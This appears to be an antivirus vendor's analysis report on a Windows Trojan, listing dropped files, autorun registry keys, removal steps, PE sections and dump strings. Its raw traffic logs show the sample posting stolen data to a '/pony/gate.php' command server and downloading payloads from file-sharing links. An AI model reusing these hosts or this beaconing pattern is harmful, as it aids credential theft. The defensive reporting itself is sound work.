The process ie.exe:1472 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 97 EA A0 F7 6D 35 E5 6F 6F 65 46 33 7A 97 6A"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\TEMP\IE9B6.tmp\SQMAPI.DLL,"

Dropped PE files

MD5	File path
2b00be8eea30b151d5a1b84e0ce0b134	c:\Documents and Settings\"%CurrentUserName%"\Application Data\msv.exe
ac2dc3101f04217a7298be46988676c9	c:\Documents and Settings\"%CurrentUserName%"\Application Data\p.exe
82c072819372b55ecb2009879f35c118	c:\Documents and Settings\"%CurrentUserName%"\Application Data\wilk.exe
90d33721af9ecdbd9fb978ebce5107e4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\ie.exe
0e552f559edb48ac376a1e54b20996fd	c:\Program Files\Internet Explorer\mswinsck.ocx
8d714a229560c585556b27aacc23016b	c:\WINDOWS\Temp\IE9B6.tmp\SQMAPI.DLL
c1e98405fb770e496c32ca1e18ffe93c	c:\WINDOWS\gbclass.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
RegSvr32.exe:744
p.exe:2008
mscorsvw.exe:172
regsvr32.exe:1024
ie.exe:1472
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\gbclass.dll (7386 bytes)
%Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)
%Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (712 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)
%Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
%Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
%Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
%Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
%WinDir%\IE9_main.log (3233 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"internet" = "explorer C:\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: fewfwefewfwe
Product Name: j45j54j445j4j45
Product Version: 1.0.0.11
Legal Copyright: wefwefwe
Legal Trademarks: 22h4j4
Original Filename: jh45j4j5
Internal Name: fewfwfwefwef
File Version: 8.9.4.1
File Description: fwefwefewfwefwef
Comments:
Language: Language Neutral

Company Name: fewfwefewfweProduct Name: j45j54j445j4j45Product Version: 1.0.0.11Legal Copyright: wefwefweLegal Trademarks: 22h4j4Original Filename: jh45j4j5Internal Name: fewfwfwefwefFile Version: 8.9.4.1File Description: fwefwefewfwefwefComments: Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	240984	241152	4.48485	80c75e8093f230761f1e69dd2b7e30b9
DATA	245760	5400	5632	3.15243	44bca2130f0a4e25d41c9968603fbb54
BSS	253952	3149	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	258048	4322	4608	3.24333	c6c5aba65d4c07941894e6c14e74fa0b
.reloc	266240	21236	21504	4.58401	4cd4e2eda34f697f185f673ac43abcb4
.rsrc	290816	15872	15872	2.59079	9268e3b3f22a4543ec6aed9b4ec6bb83

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://84.201.32.74/pony/gate.php
hxxp://ge.tt/api/1/files/71MPY782/0/blob?download	54.195.252.180
hxxp://open.ge.tt/1/files/71MPY782/0/blob?download
hxxp://s3-3-w.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475
hxxp://ge.tt/api/1/files/7Pbxr582/0/blob?download	54.195.252.180
hxxp://open.ge.tt/1/files/7Pbxr582/0/blob?download
hxxp://s3-3-w.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482
hxxp://a767.dscms.akamai.net/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475	54.231.136.26
hxxp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download	54.247.122.87
hxxp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download	54.247.122.87
hxxp://download.microsoft.com/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe	72.246.43.8
hxxp://bigbone10.info/pony/gate.php
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482	54.231.136.26
mail.google.com	74.125.226.85
ssl.gstatic.com	74.125.226.79
paco2015.ddns.net	65.181.118.218
accounts.google.com	173.194.76.84
fonts.gstatic.com	173.194.68.94

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..

HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:56 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..

HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:45 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..

HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:50 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...

GET /api/1/files/71MPY782/0/blob?download HTTP/1.1

Host: ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download

Connection: keep-alive

Transfer-Encoding: chunked

0......

GET /api/1/files/7Pbxr582/0/blob?download HTTP/1.1

Host: ge.tt

HTTP/1.1 307 Temporary Redirect

location: hXXp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download

Connection: keep-alive

Transfer-Encoding: chunked

0..

GET /download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe HTTP/1.1

Host: download.microsoft.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Tue, 08 Mar 2011 16:50:16 GMT

Accept-Ranges: bytes

ETag: "9c61fee6b0ddcb1:0"

Server: Microsoft-IIS/8.0

Content-Disposition: attachment

Content-Length: 18666800

Date: Fri, 16 Jan 2015 18:00:15 GMT

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.....a...a...a.x.....a.x...].a.x.....a.x.....a...`.2.a.x.....a.0.....a.x.....a.x.....a.Rich..a.........PE..L...Q(vM............................kv.......................................p............@...... ..........................l...@.......D...............0....P......p...................................@...............H............................text............................... ..`.data...............................@....rsrc...D...........................@..@.reloc..T....P......................@..B............................................................................................................................................................................................................................................................................................................................................................................................................$...2...H...Z...j.......................N...P...H...S.......L...I.......d.......r...d...T........... ...4...F...X...r.......................................<...R...^...n.......................................$.......L...Z...j...|.......................................0...F...V.......z...................................................8...............................t...d...H...................................p...V...J...>...2...............r...h.......0...H...\...6.........................

<<< skipped >>>

GET /1/files/71MPY782/0/blob?download HTTP/1.1

Host: w865553.open.ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475

connection: keep-alive

transfer-encoding: chunked

0..HTTP/1.1 307 Temporary Redirect..location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475..connection: keep-alive..transfer-encoding: chunked..0..

GET /gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 HTTP/1.1

Host: s3.kkloud.com.s3.amazonaws.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: ER3qduBuOtTHZsiy6kvZfJiqpYM 1pe1huMNfRFLM fDEW30G/2N8pXXGB2KHtLnrWihtk2q84w=

x-amz-request-id: 51861B5045830B3C

Date: Fri, 16 Jan 2015 17:59:54 GMT

Content-Disposition: attachment;

Last-Modified: Wed, 14 Jan 2015 14:49:40 GMT

ETag: "23fdcb8fdaf546b5884e31efad4d5711-1"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 1351680

Server: AmazonS3

OX......................B...............................................#..N.#Vjkq"rpmepco"acllmv"`g"pwl"kl"FMQ"omfg,...&.............s...s...s.(.~...s.).w...s.Pkaj..s.................RG..N....X.V...........#.....2...R...............B.......................................................................5......V7..*....2.......................B..2B..........................................R...".......B...........................,vgzv....*.......2.................."..b,fcvc........B......................B...,pqpa........2.......B..............B..B,pgnma...I...B...R...R..............B..@n.YH............OQT@TO42,FNN....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

GET /gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 HTTP/1.1

Host: s3.kkloud.com.s3.amazonaws.com

HTTP/1.1 200 OK

x-amz-id-2: xUwL2Dp4fTDppWyne6Xs/XKnAuLZg3pknIIfT0mVztfcQKSV73H4LO9L1r4vI1wbMvadtWBcpfY=

x-amz-request-id: 0F3CB638CF0CD829

Date: Fri, 16 Jan 2015 18:00:00 GMT

Content-Disposition: attachment;

Last-Modified: Wed, 07 Jan 2015 01:08:59 GMT

ETag: "0e03064e0247e969aa256eaf1bf4ddc5-1"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 126800

Server: AmazonS3

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.\J...........#.........................0....."................................. ..............................P ......l........@..Lh..............P............................................................................................text............ .......... .....U. ..`.data...:....0.......0..............@....rsrc...Lh...@...p...@..............@....reloc..p........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

GET /1/files/7Pbxr582/0/blob?download HTTP/1.1

Host: w007363.open.ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482

connection: keep-alive

transfer-encoding: chunked

0..

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;...q...2d...ZN....7M.s..rK...j..I.@E.H..*B.r0.q.N.......,............i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

....3..Tq@..ar.9..@......K.%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..

HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:39 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /pony/gate.php was not found on this server.</p>.<hr>.<address>Apache Server at bigbone10.info Port 80</address>.</body></html>...

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

msv.exe_1820:

.text

`.itext

`.data

.idata

.didata

.rdata

@.reloc

B.rsrc

biClrImportant

tagMSG

Windows

HKEY

TWMKey

KeyData

etNoMonitorSupportException

TArray

ENoMonitorSupportException

ENoMonitorSupportExceptionL

TArray

csshiftjis

windows-936

windows-1250

windows-1251

windows-1252

windows-1253

windows-1254

windows-1255

windows-1256

windows-1257

windows-1258

windows-874

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

TArray

grfLocksSupported

Operator

EVariantBadIndexError

ssShift

htKeyword

EInvalidOperation

TList.TDirection

AOperator

TThread.TSynchronizeRecord

TOperation

Operation

FOnExecute

OnExecuteh(C

TArray

TList.Sort$876$0$Intfh

TList.Sort$876$ActRec

TList.Sort$876$ActRec4

$TComponent.FindComponent$1499$0$Intfh

$TComponent.FindComponent$1499$ActRec

$TComponent.FindComponent$1499$ActRecx

TRegKeyInfo

NumSubKeys

MaxSubKeyLen

FCurrentKey

FRootKey

FCloseRootKey

CloseKey

CreateKey

DeleteKey

GetKeyInfo

GetKeyNames

HasSubKeys

KeyExists

LoadKey

MoveKey

OpenKey

OpenKeyReadOnly

ReplaceKey

RestoreKey

SaveKey

UnLoadKey

CurrentKey\

LastErrorMsg

RootKey\

RootKeyName

EInvalidGraphicOperation

SupportsPartialTransparency

SupportsClipboardFormat

Monochrome@cE

IsShortCut

FHelpKeyword

HelpKeyword

igoParentPassthrough

FAlwaysShowDragImages

AlwaysShowDragImages

toFlickFallbackKeys

'TCustomGestureEngine.TGestureEngineFlag

(TCustomGestureEngine.TGestureEngineFlags

Supported

TKeyEvent

TKeyPressEvent

FOnKeyDown

FOnKeyPress

FOnKeyUp

IsHintMsg

FNativeWheelSupport

FWheelSupportMessage

thHeaderItemLeftPressed

tsArrowBtnLeftPressed

ttbThumbLeftPressed

lrMonoChrome

FAutoHotkeys

RethinkHotkeys

AutoHotkeys

AutoHotkeysD

UnderstandsKeyword

poPortrait

APort

Port

FPasswordChar

PasswordChar

OnKeyDown

OnKeyPress

OnKeyUp\

ssHorizontal

TCustomButton.TButtonStyle

FProportional

Proportional

ssHotTrack

TWindowState

poProportional

fsShowing

FWindowState

FKeyPreview

WantChildKey

KeyPreview@

WindowState

KeyPreview0

FBiDiKeyboard

FNonBiDiKeyboard

FEnumAllWindowsOnActivateHint

FOnActionExecute

Keyword

EnumAllWindowsOnActivateHint\

BiDiKeyboard\

NonBiDiKeyboard

OnActionExecute@VF

AMsg

EIdCanNotBindPortInRange

EIdCanNotBindPortInRangeh

EIdInvalidPortRangeH

EIdInvalidPortRange$

Uh%uL

CheckIPVersionSupport

WSGetServByPort

APortNumber

VPort

IdStackWindows

TIdSocketListWindows4

TIdSocketListWindows

TIdStackWindowsg

ReceiveMsg

WSTranslateSocketErrorMsg

SupportsIPv6

TIdStackWindows

EIdIPVersionUnsupported

ReceiveMsg,

EIdPortRequired

EIdTCPConnectionError

EIdObjectTypeNotSupported

IPAsString

QuoteHTTP

Password

IdHTTPHeaderInfo

FPassword

FPort

ProxyPassword

ProxyPort\

Password\

FMetaHTTPEquiv

TIdMetaHTTPEquivE

ProcessMetaHTTPEquiv

TIdMetaHTTPEquiv

ftpTransfer

ftpReady

ftpAborted

VMsgEnd

FClientPortMin

FClientPortMax

FPeerPort

ClientPortMin

ClientPortMax\

PeerPort

"EIdTransparentProxyUDPNotSupported

OpenUDP

CloseUDP

RecvFromUDP

SendToUDPm

FLastCmdResult

TIdTCPConnectionB

RaiseExceptionForLastCmdResult

SendCmd

SendCmdf

TIdTCPConnection

IdTCPConnection

LastCmdResult

FBoundPort

FBoundPortMax

FBoundPortMin

TIdTCPClientCustom'

TIdTCPClientCustom

IdTCPClient

BoundPort

BoundPortMax

BoundPortMin

TIdTCPClient

%EIdSocksUDPNotSupportedBySOCKSVersion

%EIdSocksUDPNotSupportedBySOCKSVersionx7P

saUsernamePassword

FUDPSocksAssociation

SendToUDP9

FDefaultPort

DefaultPort

BoundPortMinh(C

fPassThrough

PassThrough

MakeFTPSvrPort

MakeFTPSvrPasv

FURL

CompressFTPDeflate

CompressFTPToIO

DecompressFTPFromIO

DecompressFTPDeflate

CompressHTTPDeflate

DecompressHTTPDeflate

URLDecode

URLEncode

Port\

FHttpOnly

HttpOnly\

FCommentURL

FPortList

FRecvPort

FUsePort

CommentURL

PortCount

UsePort

RecvPort

AURL

rsa_keygen

dsa_keygen

pub_key

priv_key

PEVP_PKEY

EVP_PKEY_union

EVP_PKEY

pkey

pkey_type

required_pkey_type

key_len

key_length

AUTHORITY_KEYID

keyid

PAUTHORITY_KEYIDh

X509_PUBKEY

public_key

PX509_PUBKEY`

X509_CERT_AUX

PX509_CERT_AUX

cert_info

ex_nscert

get_cert_methods

cert_crl

ppem_password_cb

key_arg_length

key_arg

master_key_length

master_key

sess_cert

Ptlsext_ticket_key_cb!

cert_store

default_passwd_callback

default_passwd_callback_userdata

client_cert_cb

extra_certs

max_cert_list

cert

msg_callback

msg_callback_arg

client_cert_engine

tlsext_tick_key_name

tlsext_tick_hmac_key

tlsext_tick_aes_key

tlsext_ticket_key_cb

init_msg

read_key

write_key

key_material_length

key_material

tmp_cert_type

tmp_cert_length

tmp_cert_verify_md

tmp_cert_req

tmp_key_block_length

tmp_key_block

tmp_cert_request

msg_len

w_msg_hdr

r_msg_hdr

sslvrfFailIfNoPeerCert

TCallbackExEvent

TPasswordEvent

TPasswordEventEx

VPassword

Certificate

fsRootCertFile

fsCertFile

fsKeyFile

RootCertFile\

CertFile\

KeyFile

LoadRootCert

LoadCert

fPeerCert

PeerCert

fOnGetPassword

fOnGetPasswordEx

OnGetPassword

OnGetPasswordEx

EIdOSSLLoadingRootCertError

EIdOSSLLoadingRootCertErrorpVR

EIdOSSLLoadingCertErrorXWR

EIdOSSLLoadingCertError0WR

EIdOSSLLoadingKeyError

SEC_GET_KEY_FN

KeyVer

pGetKeyFn

pvGetKeyArgument

EXPORT_SECURITY_CONTEXT_FN&

IMPORT_SECURITY_CONTEXT_FN_W(

ExportSecurityContext

ImportSecurityContextW

aPassword

6h|%S

TIdHTTPConnectionType

IdHTTP

TIdHTTPOption

TIdHTTPOptions

TIdHTTPProtocolVersion

TIdHTTPOnRedirectEvent

TIdHTTPOnHeadersAvailable

FHTTP

TIdHTTPResponse7

TIdHTTPResponse

TIdHTTPRequest5

AHTTP

TIdHTTPRequest

TIdHTTPProtocol;

TIdHTTPProtocolx4S

FHTTPProto

TIdCustomHTTP'

TIdCustomHTTP

MetaHTTPEquiv

HTTPOptions -S

TIdHTTP|FS

TIdHTTP

EIdHTTPProtocolExceptionn

EIdHTTPProtocolException

IFontAccessh

IPictureAccessh

LicenseKey

IWebBrowser

IWebBrowserApp

